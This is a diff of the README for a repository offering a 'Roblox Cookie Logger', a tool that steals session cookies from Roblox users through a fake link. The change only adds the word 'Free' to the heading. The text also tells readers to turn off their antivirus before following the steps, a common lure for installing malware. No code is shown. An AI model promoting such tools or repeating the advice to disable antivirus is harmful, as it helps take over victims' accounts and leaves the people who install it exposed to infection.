zbenntt/Roblox-Cookie-LoggerV3/README.md

-# This Is The Best Cookie Logger That Uses A Fake Link
+# This Is The Best Free Cookie Logger That Uses A Fake Link

 # Before The Steps Turn Off Antivirus Or The File Will Come Out With An ERROR Or Failed To Download Potential Virus Something Like That